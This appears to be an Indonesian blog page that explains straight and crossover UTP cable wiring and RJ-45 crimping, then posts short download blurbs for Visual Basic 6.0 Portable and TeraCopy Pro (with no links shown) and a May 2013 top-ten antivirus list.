
URUTAN-URUTAN KABEL UTP (Straight dan Cross):
Berikut ini adalah urutan pengabelan Straight :

Ujung A
1. Putih Orange
2. Orange
3. Putih Hijau
4. Biru
5. Putih Biru
6. Hijau
7. Putih Coklat
8. Coklat

Ujung B
1. Putih Orange
2. Orange
3. Putih Hijau
4. Biru
5. Putih Biru
6. Hijau
7. Putih Coklat
8. Coklat
Berikut ini adalah urutan pengabelan Cross :

Ujung A
1. Putih Orange
2. Orange
3. Putih Hijau
4. Biru
5. Putih Biru
6. Hijau
7. Putih Coklat
8. Coklat
Ujung B
1. Putih Hijau
2. Hijau
3. Putih Orange
4. Biru
5. Putih Biru
6. Orange
7. Putih Coklat
8. Coklat

Konektor
Konektor adalah peripheral yang kita pasang pada ujung kabel UTP tujuanya agar kabel dapat kita pasang pada port LAN.

Kita harus mempunyai konektor RJ-45 untuk dipasangkan pada ujung kabel UTP. dan alat ini sangat berguna sekali.
Cable Tester
Cable Tester adalah alat untuk menguji hasil krimpingan kita,tapi kalau krimpingan kita salah maka lampu di Cable Tester ini tidak akan menyala dan kalau hasil krimpingan kita sudah benar maka lampu di Cable Tester akan menyala dengan otomatis,jadi alat ini sangan berguna bagi kita untuk mengetahui hasil krimpingan kita,di bawah ini contoh gambar Cable Tester:

Praktek membuat kabel Straight

  • Kupas bagian ujung kabel UTP, kira-kira 2 cm

  • Buka pilinan kabel, luruskan dan urutankan kabel sesuai standar TIA/EIA 368B

  • Setelah urutannya sesuai standar, potong dan ratakan ujung kabel,

  • Masukan kabel yang sudah lurus dan sejajar tersebut ke dalam konektor RJ-45, dan pastikan semua kabel posisinya sudah benar.

  • Lakukan crimping menggunakan crimping tools, tekan crimping tool dan pastikan semua pin (kuningan) pada konektor RJ-45 sudah “menggigit” tiap-tiap kabel.

  • Setelah selesai pada ujung yang satu, lakukan lagi pada ujung yang lain

  • Langkah terakhir adalah menge-cek kabel yang sudah kita buat tadi dengan menggunakan LAN tester, caranya masukan masing-masing ujung kabel (konektor RJ-45) ke masing2 port yang tersedia pada LAN tester, nyalakan dan pastikan semua lampu LED menyala sesuai dengan urutan kabel yang kita buat.

  • Dibawah ini adalah contoh ujung kabel UTP yang telah terpasang konektor RJ-45 dengan benar, selubung kabel (warna biru) ikut masuk kedalam konektor, urutan kabel dari kiri ke kanan (pada gambar dibawah ini urutan pin kabel dimulai dari atas ke bawah).

Demikian penjelasan Cara mengkrimping kabel RJ45, Urutan kabel Straight & Cross, dan juga praktek pemasangan kabel Straight. Semoga bermanfaat bagi anda-anda semua

Visual Basic 6.0 Portable

Visual Basic Adalah  Turunan Bahasa Pemrograman Yang di Kembangkan Oleh MICROSOFT dan Dirilis Pada Tahun 1993, Atau Kombinasi Yang Terintegrasi Lingkungan Pemrograman ( Visual Basic Editor ) Dengan Bahasa Pemrograman ( Visual Basic ) Yang Dapat Memudahkan User Untuk Mendesain dan Membuat Program


Link Download :

TeraCopy Pro

Paling Males Copy Paste Dari File Ke File Lain Banyak Terus Lama Lagi..
Kita Punya Penangkalnya Mungkin Software Ini Sudah Banyak Yang Punya..
Jadi Kita Share Buat Yang Belom Punya :P :P :P



Link Download :

10 Antivirus Terbaik 2013

10 Antivirus Terbaik Mei 2013 - Yapp Sekarang Kita Mau Share Nih Urutan 1-10 Antivirus Terbaik Mei 2013..














Yuk Langsung Aja Cekidot..


1. BitDefender Antvirus Plus

Link Website : Klik Disini
2. Kaperseky Antivirus
Link Website : Klik Disini
3. Norton AntiVirus
Link Website : Klik Disini 
4. F-Secure Anti-Virus
Link Website : Klik Disini
5. G Data AntiVirus
Link Website : Klik Disini
6. BullGuard AntiVirus
Link Website : Klik Disini 
7. AVG Anti-Virus
Link Website : Klik Disini
8. Avast! Pro AntiVirus
Link Website : Klik Disini
9. Trend Micro Titanium AntiVirus +
Link Website : Klik Disini
10. VIPRE AntiVirus
Link Website : Klik Disini

Nah Diatas Adalah Urutan 10 Antivirus Terbaik Bulan Mei 2013 Ini..

Kalian Tinggal Pilih Yang Mana.. Sudah Pasti Terpercaya..
Postingannya Sedikit ? Tapi Bermanfaat..

Wassalam..

Visitors

 
Support : DMCA | Google Chrome | Mediafire
Copyright © 2011. Download It's Free - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger